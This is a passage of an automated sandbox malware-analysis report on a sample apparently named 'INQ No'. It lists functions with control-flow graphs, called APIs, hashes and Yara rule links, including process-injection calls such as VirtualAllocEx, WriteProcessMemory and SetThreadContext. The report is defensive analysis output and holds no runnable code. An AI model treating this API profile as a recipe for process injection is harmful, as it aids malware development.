                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateProcess
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 963392458-0
                                                                                                                                                                            • Opcode ID: 69461f5ae42c196154289dbf875a50d85ac6b16db67e74b2cea546f6ecec9a7e
                                                                                                                                                                            • Instruction ID: d2760e08e16ee8d2ebfaf07b12f082a21cbd6331354aa61c86e05704c87627be
                                                                                                                                                                            • Opcode Fuzzy Hash: 69461f5ae42c196154289dbf875a50d85ac6b16db67e74b2cea546f6ecec9a7e
                                                                                                                                                                            • Instruction Fuzzy Hash: FF9149B1E0025ADFEB20CF68C845BEDBBB2EF48314F148169D808E7244EB759985CF91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 018BBCB8 Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2562 18bbcb8-18bbcd7 2563 18bbcd9-18bbce6 call 18b921c 2562->2563 2564 18bbd03-18bbd07 2562->2564 2569 18bbce8 2563->2569 2570 18bbcfc 2563->2570 2566 18bbd1b-18bbd5c 2564->2566 2567 18bbd09-18bbd13 2564->2567 2573 18bbd69-18bbd77 2566->2573 2574 18bbd5e-18bbd66 2566->2574 2567->2566 2619 18bbcee call 18bbf50 2569->2619 2620 18bbcee call 18bbf60 2569->2620 2570->2564 2575 18bbd9b-18bbd9d 2573->2575 2576 18bbd79-18bbd7e 2573->2576 2574->2573 2581 18bbda0-18bbda7 2575->2581 2578 18bbd89 2576->2578 2579 18bbd80-18bbd87 call 18bb66c 2576->2579 2577 18bbcf4-18bbcf6 2577->2570 2580 18bbe38-18bbeb6 2577->2580 2583 18bbd8b-18bbd99 2578->2583 2579->2583 2612 18bbeb8-18bbebc 2580->2612 2613 18bbebd-18bbef8 2580->2613 2584 18bbda9-18bbdb1 2581->2584 2585 18bbdb4-18bbdbb 2581->2585 2583->2581 2584->2585 2587 18bbdc8-18bbdd1 call 18bb67c 2585->2587 2588 18bbdbd-18bbdc5 2585->2588 2593 18bbdde-18bbde3 2587->2593 2594 18bbdd3-18bbddb 2587->2594 2588->2587 2595 18bbe01-18bbe05 2593->2595 2596 18bbde5-18bbdec 2593->2596 2594->2593 2621 18bbe08 call 18bc250 2595->2621 2622 18bbe08 call 18bc260 2595->2622 2596->2595 2598 18bbdee-18bbdfe call 18bb68c call 18bb69c 2596->2598 2598->2595 2601 18bbe0b-18bbe0e 2603 18bbe31-18bbe37 2601->2603 2604 18bbe10-18bbe2e 2601->2604 2604->2603 2612->2613 2614 18bbefa-18bbefd 2613->2614 2615 18bbf00-18bbf2b GetModuleHandleW 2613->2615 2614->2615 2616 18bbf2d-18bbf33 2615->2616 2617 18bbf34-18bbf48 2615->2617 2616->2617 2619->2577 2620->2577 2621->2601 2622->2601
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetModuleHandleW.KERNELBASE(00000000), ref: 018BBF1E
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: HandleModule
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4139908857-0
                                                                                                                                                                            • Opcode ID: 7d432739e1228fd7e607134a01b9972a0f700e35b743f9f66f8afb8ccba4fa65
                                                                                                                                                                            • Instruction ID: d23667e594cd72eaeead6d68bab7d4f5e961fa1254fb98bf0c040482667531dd
                                                                                                                                                                            • Opcode Fuzzy Hash: 7d432739e1228fd7e607134a01b9972a0f700e35b743f9f66f8afb8ccba4fa65
                                                                                                                                                                            • Instruction Fuzzy Hash: EB814470A00B058FDB24CF29D48479ABBF1FF88310F04892DE586CBB50D775EA498B91
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C27B0 Relevance: 1.6, APIs: 1, Instructions: 148COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2623 57c27b0-57c27c4 2624 57c27fe-57c280e 2623->2624 2625 57c27c6-57c27ed 2623->2625 2628 57c2815-57c2876 2624->2628 2629 57c2810-57c2814 2624->2629 2626 57c27f5-57c27f6 2625->2626 2627 57c27f0 call 57c1c70 2625->2627 2627->2626 2630 57c2878-57c287e 2628->2630 2631 57c2881-57c2888 2628->2631 2629->2628 2630->2631 2632 57c288a-57c2890 2631->2632 2633 57c2893-57c28cb 2631->2633 2632->2633 2634 57c28d3-57c2932 CreateWindowExW 2633->2634 2635 57c293b-57c2973 2634->2635 2636 57c2934-57c293a 2634->2636 2640 57c2975-57c2978 2635->2640 2641 57c2980 2635->2641 2636->2635 2640->2641 2642 57c2981 2641->2642 2642->2642
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057C2922
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                            • Opcode ID: f9b57ef4b3863ddacf2941d090e266bc736c3768bce17f57cd2278ad023aa836
                                                                                                                                                                            • Instruction ID: dda93c7c71b32f8548ae2b72fd85c288345575997e6100acbd62b51c2fb6776a
                                                                                                                                                                            • Opcode Fuzzy Hash: f9b57ef4b3863ddacf2941d090e266bc736c3768bce17f57cd2278ad023aa836
                                                                                                                                                                            • Instruction Fuzzy Hash: 86510FB5C00249AFCF15CF99C984ADDBFB2FF49310F54816AE818AB221C775A941DF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C1C70 Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2643 57c1c70-57c2876 2646 57c2878-57c287e 2643->2646 2647 57c2881-57c2888 2643->2647 2646->2647 2648 57c288a-57c2890 2647->2648 2649 57c2893-57c2932 CreateWindowExW 2647->2649 2648->2649 2651 57c293b-57c2973 2649->2651 2652 57c2934-57c293a 2649->2652 2656 57c2975-57c2978 2651->2656 2657 57c2980 2651->2657 2652->2651 2656->2657 2658 57c2981 2657->2658 2658->2658
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 057C2922
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CreateWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 716092398-0
                                                                                                                                                                            • Opcode ID: 9bc31b3ff3f80d5dbcb26a967c3e3d683effb9f6ec764d87ffb1f9a6cf3a854e
                                                                                                                                                                            • Instruction ID: 50394d701d605d56e5bf5042912ce1667e4dea6a9571defc9f519d52240f9b96
                                                                                                                                                                            • Opcode Fuzzy Hash: 9bc31b3ff3f80d5dbcb26a967c3e3d683effb9f6ec764d87ffb1f9a6cf3a854e
                                                                                                                                                                            • Instruction Fuzzy Hash: 4351ABB5D003499BDB14CF9AC884ADEBBB5BF48310F64812EE819AB211D775A841CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 018B4538 Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2659 18b4538-18b5dd9 CreateActCtxA 2662 18b5ddb-18b5de1 2659->2662 2663 18b5de2-18b5e3c 2659->2663 2662->2663 2670 18b5e4b-18b5e4f 2663->2670 2671 18b5e3e-18b5e41 2663->2671 2672 18b5e51-18b5e5d 2670->2672 2673 18b5e60 2670->2673 2671->2670 2672->2673 2675 18b5e61 2673->2675 2675->2675
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 018B5DC9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 8f4c3f173b5678376b5e4867aec0ae1f1e64133f6ce2d7509c0b04da19ec1d71
                                                                                                                                                                            • Instruction ID: 3484ece15b63ceb5c58450aa32da313d26990b88a9f72212270f56b34ed8d199
                                                                                                                                                                            • Opcode Fuzzy Hash: 8f4c3f173b5678376b5e4867aec0ae1f1e64133f6ce2d7509c0b04da19ec1d71
                                                                                                                                                                            • Instruction Fuzzy Hash: AA41BFB1C0071DCBEB24DFA9C885BDDBBB5BF48314F20816AD508AB251DB756A46CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 018B5D0D Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2676 18b5d0d-18b5dd9 CreateActCtxA 2678 18b5ddb-18b5de1 2676->2678 2679 18b5de2-18b5e3c 2676->2679 2678->2679 2686 18b5e4b-18b5e4f 2679->2686 2687 18b5e3e-18b5e41 2679->2687 2688 18b5e51-18b5e5d 2686->2688 2689 18b5e60 2686->2689 2687->2686 2688->2689 2691 18b5e61 2689->2691 2691->2691
                                                                                                                                                                            APIs
                                                                                                                                                                            • CreateActCtxA.KERNEL32(?), ref: 018B5DC9
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Create
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2289755597-0
                                                                                                                                                                            • Opcode ID: 022d067b5af944841cd7d796268bf795cd1caf2e8d81703678fc772b5a209975
                                                                                                                                                                            • Instruction ID: 9557f9fb450f047afbe2870305153fa9e50d4389abadaa67756ce8ccd5bb7c66
                                                                                                                                                                            • Opcode Fuzzy Hash: 022d067b5af944841cd7d796268bf795cd1caf2e8d81703678fc772b5a209975
                                                                                                                                                                            • Instruction Fuzzy Hash: 2A41D0B1C00719CBEB24DFA9C885BDDBBB1FF48314F20816AD508AB251DB756A46CF90
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 057C1DC4 Relevance: 1.6, APIs: 1, Instructions: 83COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2692 57c1dc4-57c4e1c 2696 57c4ecc-57c4eec call 57c1c9c 2692->2696 2697 57c4e22-57c4e27 2692->2697 2704 57c4eef-57c4efc 2696->2704 2699 57c4e29-57c4e60 2697->2699 2700 57c4e7a-57c4eb2 CallWindowProcW 2697->2700 2706 57c4e69-57c4e78 2699->2706 2707 57c4e62-57c4e68 2699->2707 2701 57c4ebb-57c4eca 2700->2701 2702 57c4eb4-57c4eba 2700->2702 2701->2704 2702->2701 2706->2704 2707->2706
                                                                                                                                                                            APIs
                                                                                                                                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 057C4EA1
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1437739224.00000000057C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 057C0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_57c0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CallProcWindow
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2714655100-0
                                                                                                                                                                            • Opcode ID: fb0928c344a163e2e1eb6a98cf785ddf725e0b45f382c5f6461b7a3f6ba7407e
                                                                                                                                                                            • Instruction ID: 5028aa6fbaf1c0b4ff15231aea96ca0100cc17f6c814c30c843fb320a23b57e9
                                                                                                                                                                            • Opcode Fuzzy Hash: fb0928c344a163e2e1eb6a98cf785ddf725e0b45f382c5f6461b7a3f6ba7407e
                                                                                                                                                                            • Instruction Fuzzy Hash: C63137B4900309CFDB10DF89C449BAABFF6FB89325F25849DD419A7211C335A841CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07865C49 Relevance: 1.6, APIs: 1, Instructions: 73injectionCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2710 7865c49-7865c9e 2713 7865ca0-7865cac 2710->2713 2714 7865cae-7865ced WriteProcessMemory 2710->2714 2713->2714 2716 7865cf6-7865d26 2714->2716 2717 7865cef-7865cf5 2714->2717 2717->2716
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07865CE0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                            • Opcode ID: 513bfc867171311e34693127fa7b208182386a53be5bc3124afb4bb21b31f753
                                                                                                                                                                            • Instruction ID: 39852165702dde077ba71a0d247356677bcbe6c3c0710b7727239bc94443bf11
                                                                                                                                                                            • Opcode Fuzzy Hash: 513bfc867171311e34693127fa7b208182386a53be5bc3124afb4bb21b31f753
                                                                                                                                                                            • Instruction Fuzzy Hash: C02148B1D0031A9FDB10CFA9C885BEEBBF5FF48320F108429E959A7240C7789954CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07865C50 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2721 7865c50-7865c9e 2723 7865ca0-7865cac 2721->2723 2724 7865cae-7865ced WriteProcessMemory 2721->2724 2723->2724 2726 7865cf6-7865d26 2724->2726 2727 7865cef-7865cf5 2724->2727 2727->2726
                                                                                                                                                                            APIs
                                                                                                                                                                            • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 07865CE0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessWrite
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3559483778-0
                                                                                                                                                                            • Opcode ID: e908830fb19b5e59d1bde79846b3c3b7431af7a06bc095ae70e7e10469d92149
                                                                                                                                                                            • Instruction ID: 652c43bbe58e538686de269dc6f1acfb9e4e2d0c5f69b0d86641dc4317472d16
                                                                                                                                                                            • Opcode Fuzzy Hash: e908830fb19b5e59d1bde79846b3c3b7431af7a06bc095ae70e7e10469d92149
                                                                                                                                                                            • Instruction Fuzzy Hash: C32139B1D003499FDB10DFA9C885BDEBBF5FF48320F508429E919A7240C7789954CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 018BE1A0 Relevance: 1.6, APIs: 1, Instructions: 68COMMON
                                                                                                                                                                            Download Yara Rule

                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                            • Executed
                                                                                                                                                                            • Not Executed
                                                                                                                                                                            control_flow_graph 2731 18be1a0-18be1a6 2732 18be1a8-18be1ac 2731->2732 2733 18be1ad-18be23c DuplicateHandle 2731->2733 2732->2733 2734 18be23e-18be244 2733->2734 2735 18be245-18be262 2733->2735 2734->2735
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018BE16E,?,?,?,?,?), ref: 018BE22F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: 6204e658171ce9788b74ad120c87a4e1baf20bd5058de9361c676204ffa40959
                                                                                                                                                                            • Instruction ID: af53eef2195b13789b63487bd14ce38c111f10b2112f15dfa938f950da4345a9
                                                                                                                                                                            • Opcode Fuzzy Hash: 6204e658171ce9788b74ad120c87a4e1baf20bd5058de9361c676204ffa40959
                                                                                                                                                                            • Instruction Fuzzy Hash: A221E5B5D002499FDB10CF9AD885ADEBBF9EB48320F14841AE915A3350D774AA45CF60
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07865D38 Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07865DC0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                            • Opcode ID: 931907ab0f55b5f340c94e9072061e760bae6f33540698421717eb4e713dcd58
                                                                                                                                                                            • Instruction ID: d8186f602a1a1c4859da8f5b2cb3e3871e23273620995738ada48b55dfd26393
                                                                                                                                                                            • Opcode Fuzzy Hash: 931907ab0f55b5f340c94e9072061e760bae6f33540698421717eb4e713dcd58
                                                                                                                                                                            • Instruction Fuzzy Hash: 372139B1D003499FDB10CFA9C884BEEBBF5FF48310F50852AE559A7240CB359511CBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 018BDAF0 Relevance: 1.6, APIs: 1, Instructions: 65COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,018BE16E,?,?,?,?,?), ref: 018BE22F
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: DuplicateHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3793708945-0
                                                                                                                                                                            • Opcode ID: f1955271dfc700bb0b9c3740e1e8f70dabaad59cfbbcd2be3c2f025704579ede
                                                                                                                                                                            • Instruction ID: 735029271dda978dd87f4c396ff791491649f8f0aef9157667cf9b461832fd29
                                                                                                                                                                            • Opcode Fuzzy Hash: f1955271dfc700bb0b9c3740e1e8f70dabaad59cfbbcd2be3c2f025704579ede
                                                                                                                                                                            • Instruction Fuzzy Hash: 0321E5B5D0024D9FDB10CF9AD885AEEBBF4FB48310F14841AE918A7350D375A944CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07865AB0 Relevance: 1.6, APIs: 1, Instructions: 64threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07865B36
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                            • Opcode ID: 122a6a4ef52f4b67af73adb56d31f2cf834610928f276f64a60b5c3b42ce8e29
                                                                                                                                                                            • Instruction ID: e2ad8766e5324617ccb786d6feff33a636a59c4701c4db2b031eb0631b8a7f80
                                                                                                                                                                            • Opcode Fuzzy Hash: 122a6a4ef52f4b67af73adb56d31f2cf834610928f276f64a60b5c3b42ce8e29
                                                                                                                                                                            • Instruction Fuzzy Hash: 20213AB1D003099FDB24DFA9C4857EEBBF5EF88320F548429D419A7240CB789945CF55
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07865D40 Relevance: 1.6, APIs: 1, Instructions: 63COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 07865DC0
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: MemoryProcessRead
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1726664587-0
                                                                                                                                                                            • Opcode ID: 33eaaa6ec64d5b65a664d358b26322ff28014b21d39ddc9f05aa4b8314c05271
                                                                                                                                                                            • Instruction ID: 6d132716a642cae314ad4920929e8868e992b54830e1e0abc6069de62e299e11
                                                                                                                                                                            • Opcode Fuzzy Hash: 33eaaa6ec64d5b65a664d358b26322ff28014b21d39ddc9f05aa4b8314c05271
                                                                                                                                                                            • Instruction Fuzzy Hash: 502128B1C003499FDB10DFAAC885BEEBBF5FF48310F508429E959A7240CB399941DBA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07865AB8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 07865B36
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ContextThreadWow64
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 983334009-0
                                                                                                                                                                            • Opcode ID: ecd8c6eeee0e8c0802e20100a5adc516adfb986ab2c6083f3913fa63f222e8c9
                                                                                                                                                                            • Instruction ID: 483bda3263975fd3a02e35f7b4a7e63ddc7b829b6bd00cda1bf7132873556bba
                                                                                                                                                                            • Opcode Fuzzy Hash: ecd8c6eeee0e8c0802e20100a5adc516adfb986ab2c6083f3913fa63f222e8c9
                                                                                                                                                                            • Instruction Fuzzy Hash: 2C2129B1D003099FDB20DFAAC885BEEBBF4EF48320F548429D559A7240DB789945CFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 07865B88 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 07865BFE
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1438749988.0000000007860000.00000040.00000800.00020000.00000000.sdmp, Offset: 07860000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_7860000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: AllocVirtual
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 4275171209-0
                                                                                                                                                                            • Opcode ID: 048ac6d9499bf151720770ea33c1e061a82b2f0dd4b505e8f56bb45323a5e725
                                                                                                                                                                            • Instruction ID: 2a77595b17e32151aba747ecc31cd14f037c7ed55191d3c9dab38dcf249ea772
                                                                                                                                                                            • Opcode Fuzzy Hash: 048ac6d9499bf151720770ea33c1e061a82b2f0dd4b505e8f56bb45323a5e725
                                                                                                                                                                            • Instruction Fuzzy Hash: 161159B1C003499FDB20DFA9C844BEEBBF5EF88324F248419E555A7250C7359941CFA0
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 018BB6C8 Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,018BBF99,00000800,00000000,00000000), ref: 018BC1AA
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1435298293.00000000018B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 018B0000, based on PE: false
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_18b0000_INQ No.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: LibraryLoad
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 1029625771-0
                                                                                                                                                                            • Opcode ID: 203b26fbaeede8783ce5912ecd578b212ec7627f11baaeea0899288c490552e7
                                                                                                                                                                            • Instruction ID: 6150afd65ef6a98b15128c959f3727c490b5a6609b257dfd4bd63d2a586219fb
                                                                                                                                                                            • Opcode Fuzzy Hash: 203b26fbaeede8783ce5912ecd578b212ec7627f11baaeea0899288c490552e7
                                                                                                                                                                            • Instruction Fuzzy Hash: EA11C2B6D006499BDB20DF9AD884ADEBBF5EB48310F10842AE519A7200C775AA45CFA5
                                                                                                                                                                            Uniqueness

                                                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                                                            Function 018BC138 Relevance: 1.6, APIs: 1, Instructions: 54libraryCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
